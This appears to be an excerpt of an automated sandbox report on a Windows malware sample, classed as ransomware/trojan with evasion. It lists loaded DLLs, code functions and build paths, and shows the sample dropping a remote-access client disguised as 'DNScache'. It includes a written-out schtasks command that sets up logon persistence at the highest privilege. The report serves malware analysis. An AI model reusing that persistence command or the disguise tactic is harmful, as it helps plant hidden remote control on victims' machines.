                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_110503E09_2_110503E0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_110724D09_2_110724D0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_110329A09_2_110329A0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_111228609_2_11122860
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_1100887B9_2_1100887B
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_11044B909_2_11044B90
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_1101CBB09_2_1101CBB0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_11086D609_2_11086D60
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeProcess token adjusted: SecurityJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: String function: 6CD430A0 appears 54 times
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: String function: 6CE00950 appears 68 times
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: String function: 110B6AB0 appears 41 times
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: String function: 6CD57A90 appears 62 times
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: String function: 1116B6F0 appears 74 times
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: String function: 110274F0 appears 94 times
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: String function: 1116FD13 appears 40 times
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: String function: 1109C970 appears 32 times
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: String function: 1105D480 appears 54 times
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: String function: 110290C0 appears 2088 times
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: String function: 6CD46F50 appears 171 times
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: String function: 11142790 appears 1186 times
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: String function: 6CD57D00 appears 135 times
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: String function: 111606A0 appears 64 times
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: String function: 6CD6F3CB appears 33 times
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: String function: 11080CC0 appears 85 times
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: String function: 6CD57C70 appears 36 times
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: String function: 6CD69480 appears 61 times
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: String function: 1115CAC3 appears 95 times
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: String function: 11143200 appears 46 times
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: String function: 1105D350 appears 564 times
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00407AE0 appears 33 times
                                Source: mscpx32r.dLL.4.drStatic PE information: No import functions for PE file found
                                Source: netmsg.dll.4.drStatic PE information: No import functions for PE file found
                                Source: neth.dll.4.drStatic PE information: No import functions for PE file found
                                Source: Jjv9ha2GKn.exe, 00000000.00000000.2041444310.0000000000862000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameTableTextCompare.exeB vs Jjv9ha2GKn.exe
                                Source: Jjv9ha2GKn.exe, 00000000.00000002.2761866053.0000000007570000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRP8SH.dll6 vs Jjv9ha2GKn.exe
                                Source: Jjv9ha2GKn.exe, 00000000.00000002.2750654559.000000000089E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Jjv9ha2GKn.exe
                                Source: Jjv9ha2GKn.exe, 00000000.00000002.2759945326.00000000051E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTokenTableApp.dll> vs Jjv9ha2GKn.exe
                                Source: Jjv9ha2GKn.exeBinary or memory string: OriginalFilenameTableTextCompare.exeB vs Jjv9ha2GKn.exe
                                Source: Jjv9ha2GKn.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: classification engineClassification label: mal100.rans.troj.evad.winEXE@9/27@3/3
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_11059290 GetLastError,FormatMessageA,LocalFree,7_2_11059290
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_1109C580 AdjustTokenPrivileges,CloseHandle,7_2_1109C580
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_1109C4F0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,7_2_1109C4F0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_1109C580 AdjustTokenPrivileges,CloseHandle,9_2_1109C580
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_1109C4F0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,9_2_1109C4F0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_11095A00 GetTickCount,CoInitialize,CLSIDFromProgID,CoCreateInstance,CoUninitialize,7_2_11095A00
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_110CC3D0 IsWindow,IsWindowVisible,SetForegroundWindow,FindResourceExA,LoadResource,LockResource,DialogBoxIndirectParamA,DialogBoxParamA,7_2_110CC3D0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_11124DC0 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,7_2_11124DC0
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Jjv9ha2GKn.exe.logJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeMutant created: NULL
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutant created: \Sessions\1\BaseNamedObjects\bghe5h5enr5ejm45nt6tv453v43cv45hn45nm
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1536:120:WilError_03
                                Source: Jjv9ha2GKn.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: Jjv9ha2GKn.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: Jjv9ha2GKn.exeReversingLabs: Detection: 47%
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeFile read: C:\Users\user\Desktop\Jjv9ha2GKn.exeJump to behavior
                                Source: unknownProcess created: C:\Users\user\Desktop\Jjv9ha2GKn.exe "C:\Users\user\Desktop\Jjv9ha2GKn.exe"
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc ONLOGON /tn "DNScache" /tr "C:\Users\user\AppData\Local\DNScache\client32.exe" /RL HIGHEST
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\AppData\Local\DNScache\client32.exe C:\Users\user\AppData\Local\DNScache\client32.exe
                                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\Users\user\AppData\Local\DNScache\client32.exe C:\Users\user\AppData\Local\DNScache\client32.exe
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc ONLOGON /tn "DNScache" /tr "C:\Users\user\AppData\Local\DNScache\client32.exe" /RL HIGHESTJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\AppData\Local\DNScache\client32.exe C:\Users\user\AppData\Local\DNScache\client32.exeJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeSection loaded: dwrite.dllJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeSection loaded: windowscodecs.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: dbgcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: pcihooks.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: riched32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: pciinv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: firewallapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: fwbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile written: C:\Users\user\AppData\Local\DNScache\client32.iniJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeFile opened: C:\Windows\SysWOW64\riched32.dllJump to behavior
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                                Source: Jjv9ha2GKn.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                                Source: Jjv9ha2GKn.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                                Source: Jjv9ha2GKn.exeStatic file information: File size 1128960 > 1048576
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeFile opened: C:\Users\user\AppData\Local\DNScache\MSVCR100.dllJump to behavior
                                Source: Jjv9ha2GKn.exeStatic PE information: section name: RT_CURSOR
                                Source: Jjv9ha2GKn.exeStatic PE information: section name: RT_BITMAP
                                Source: Jjv9ha2GKn.exeStatic PE information: section name: RT_ICON
                                Source: Jjv9ha2GKn.exeStatic PE information: section name: RT_MENU
                                Source: Jjv9ha2GKn.exeStatic PE information: section name: RT_DIALOG
                                Source: Jjv9ha2GKn.exeStatic PE information: section name: RT_STRING
                                Source: Jjv9ha2GKn.exeStatic PE information: section name: RT_ACCELERATOR
                                Source: Jjv9ha2GKn.exeStatic PE information: section name: RT_GROUP_ICON
                                Source: Jjv9ha2GKn.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x10fa00
                                Source: Jjv9ha2GKn.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Source: Binary string: msvcr100.i386.pdb source: client32.exe, client32.exe, 00000007.00000002.3304858661.000000006CDF1000.00000020.00000001.01000000.00000011.sdmp, client32.exe, 00000009.00000002.2890200975.000000006CDF1000.00000020.00000001.01000000.00000011.sdmp, msvcr100.dll.4.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: client32.exe, 00000007.00000002.3305095577.000000006F6F2000.00000002.00000001.01000000.0000000F.sdmp, client32.exe, 00000009.00000002.2890449063.000000006F6F2000.00000002.00000001.01000000.0000000F.sdmp, PCICHEK.DLL.4.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, client32.exe, 00000009.00000002.2889815261.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, PCICL32.DLL.4.dr
                                Source: Binary string: msauserext.pdbGCTL source: msauserext.dll.4.dr
                                Source: Binary string: mscpxl32.pdb source: mscpxl32.dLL.4.dr
                                Source: Binary string: mscpxl32.pdbGCTL source: mscpxl32.dLL.4.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.4.dr
                                Source: Binary string: mscat32.pdbGCTL source: mscat32.dll.4.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: client32.exe, 00000007.00000002.3304754604.000000006CD80000.00000002.00000001.01000000.00000012.sdmp, HTCTL32.DLL.4.dr
                                Source: Binary string: d:\a01\_work\2\s\\binaries\x86ret\bin\i386\\msvcp140_1.i386.pdb source: msvcp140_1.dll.4.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\AudioCapture\Release\AudioCapture.pdb source: AudioCapture.dll.4.dr
                                Source: Binary string: client32_ctr.pdb0\1100\client32\Release\client32_ctr.pdbP source: AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.4.dr
                                Source: Binary string: msauserext.pdb source: msauserext.dll.4.dr
                                Source: Binary string: client32_ctr.pdb source: AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.4.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\release\tcctl32.pdbP source: TCCTL32.DLL.4.dr
